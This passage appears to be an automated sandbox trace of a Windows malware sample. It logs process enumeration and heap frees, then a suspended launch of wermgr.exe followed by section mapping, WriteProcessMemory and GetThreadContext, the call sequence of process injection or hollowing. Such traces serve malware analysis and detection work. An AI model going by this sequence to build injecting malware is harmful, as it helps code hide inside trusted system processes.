szExeFile="spcwin.exe")) returned 1 [0207.302] Sleep (dwMilliseconds=0xa) [0207.316] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0207.317] Sleep (dwMilliseconds=0xa) [0207.331] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0207.332] Sleep (dwMilliseconds=0xa) [0207.347] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="they-ball-board.exe")) returned 1 [0207.348] Sleep (dwMilliseconds=0xa) [0207.362] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x76c, pcPriClassBase=8, dwFlags=0x0, szExeFile="concern.exe")) returned 1 [0207.363] Sleep (dwMilliseconds=0xa) [0207.379] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x624, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0207.380] Sleep (dwMilliseconds=0xa) [0207.411] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0207.412] Sleep (dwMilliseconds=0xa) [0207.425] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x38c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0207.426] Sleep (dwMilliseconds=0xa) [0207.449] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x10ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0207.451] Sleep (dwMilliseconds=0xa) [0207.472] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x11b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0207.473] Sleep (dwMilliseconds=0xa) [0207.487] Process32Next (in: hSnapshot=0x268, lppe=0x607eae0 | out: lppe=0x607eae0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x11b8, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 0 [0207.489] CloseHandle (hObject=0x268) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62817d0 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62817e8 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281808 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f770 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281838 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281850 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281868 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281820 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281880 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62817b0 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281898 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62817c0 | out: hHeap=0x6200000) returned 1 [0207.489] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818d0 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818e0 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281798 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281908 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281920 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818f8 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281968 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281980 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281998 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62818b0 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f068 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f0c0 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f258 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f1b0 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f180 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f138 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281938 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f040 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f270 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f210 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f108 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f1c8 | out: hHeap=0x6200000) returned 1 [0207.490] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f0d8 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f008 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f228 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f240 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f0f0 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6281958 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f0a8 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f028 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f168 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f150 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f198 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f120 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f1f8 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f288 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f1e0 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200960 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2c0 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200ba0 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f298 | out: hHeap=0x6200000) returned 1 [0207.491] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200ac8 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200a20 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200bb8 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200a98 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f370 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f390 | out: hHeap=0x6200000) returned 1 [0207.492] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f3b8 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f3d8 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200978 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f350 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f300 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2a8 | out: hHeap=0x6200000) returned 1 [0207.493] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62009f0 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200b28 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f330 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62008e8 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2e0 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f438 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f2d0 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200ab0 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f400 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200900 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f410 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200990 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f420 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62009a8 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f480 | out: hHeap=0x6200000) returned 1 [0207.494] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200d00 | out: hHeap=0x6200000) returned 1 [0207.494] lstrlenW (lpString="䉁䑃䙅هR´") returned 7 [0207.494] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0xc) returned 0x62009f0 [0207.494] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0x607f540, cchNumber=34 | out: lpNumberStr="è\x07T") returned 0 [0207.494] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x42) returned 0x627f008 [0207.495] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\SysWOW64\\wermgr.exe", lpDst=0x607f5c0, nSize=0x104 | out: lpDst="C:\\Windows\\SysWOW64\\wermgr.exe") returned 0x1f [0207.495] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x627f008 | out: hHeap=0x6200000) returned 1 [0207.495] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x3e) returned 0x627f008 [0207.495] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0x607f540, cchNumber=34 | out: lpNumberStr="<") returned 0 [0207.495] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x5a) returned 0x6200eb0 [0207.495] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\SysWOW64\\backgroundTaskHost.exe", lpDst=0x607f5c0, nSize=0x104 | out: lpDst="C:\\Windows\\SysWOW64\\backgroundTaskHost.exe") returned 0x2b [0207.496] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200eb0 | out: hHeap=0x6200000) returned 1 [0207.496] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x56) returned 0x6200eb0 [0207.496] GetNumberFormatA (in: Locale=0x7d3, dwFlags=0xb4, lpValue="electricmadness", lpFormat=0x0, lpNumberStr=0x607f540, cchNumber=34 | out: lpNumberStr="T") returned 0 [0207.496] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x42) returned 0x6200f10 [0207.496] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\SysWOW64\\dxdiag.exe", lpDst=0x607f5c0, nSize=0x104 | out: lpDst="C:\\Windows\\SysWOW64\\dxdiag.exe") returned 0x1f [0207.497] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x6200f10 | out: hHeap=0x6200000) returned 1 [0207.497] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x3e) returned 0x6200f10 [0207.497] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\wermgr.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x607f7a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x607f7f8 | out: lpCommandLine="C:\\Windows\\SysWOW64\\wermgr.exe", lpProcessInformation=0x607f7f8*(hProcess=0x26c, hThread=0x268, dwProcessId=0x1330, dwThreadId=0x132c)) returned 1 [0207.577] NtCreateSection (in: SectionHandle=0x607f4c0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x607f49c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x607f4c0*=0x274) returned 0x0 [0207.577] RegisterClassExA (param_1=0x607f46c) returned 0x0 [0207.577] GetCurrentProcess () returned 0xffffffff [0207.577] NtMapViewOfSection (in: SectionHandle=0x274, ProcessHandle=0xffffffff, BaseAddress=0x607f4c4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x607f4bc*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x607f4c4*=0x7e0000, SectionOffset=0x0, ViewSize=0x607f4bc*=0x24000) returned 0x0 [0207.579] NtMapViewOfSection (in: SectionHandle=0x274, ProcessHandle=0x26c, BaseAddress=0x607f4cc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x607f4bc*=0x24000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x607f4cc*=0x4400000, SectionOffset=0x0, ViewSize=0x607f4bc*=0x24000) returned 0x0 [0207.580] RtlAllocateHeap (HeapHandle=0x6200000, Flags=0x8, Size=0x1ac6) returned 0x62848e0 [0207.580] VirtualAllocEx (hProcess=0x26c, lpAddress=0x0, dwSize=0x1ac4, flAllocationType=0x1000, flProtect=0x4) returned 0x41e0000 [0207.581] WriteProcessMemory (in: hProcess=0x26c, lpBaseAddress=0x41e0000, lpBuffer=0x62848e0*, nSize=0x1ac4, lpNumberOfBytesWritten=0x607f4b8 | out: lpBuffer=0x62848e0*, lpNumberOfBytesWritten=0x607f4b8*=0x1ac4) returned 1 [0207.583] HeapFree (in: hHeap=0x6200000, dwFlags=0x0, lpMem=0x62848e0 | out: hHeap=0x6200000) returned 1 [0207.586] lstrlenW (lpString="䉁䑃䙅") returned 3 [0207.586] GetCurrentProcess () returned 0xffffffff [0207.586] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7e0000) returned 0x0 [0207.612] NtClose (Handle=0x274) returned 0x0 [0207.613] GetThreadContext (in: hThread=0x268, lpContext=0x607f4e8 | out: lpContext=0x607f4e8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x42c6000, Edx=0x0, Ecx=0x0, Eax=0x1a9700, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, 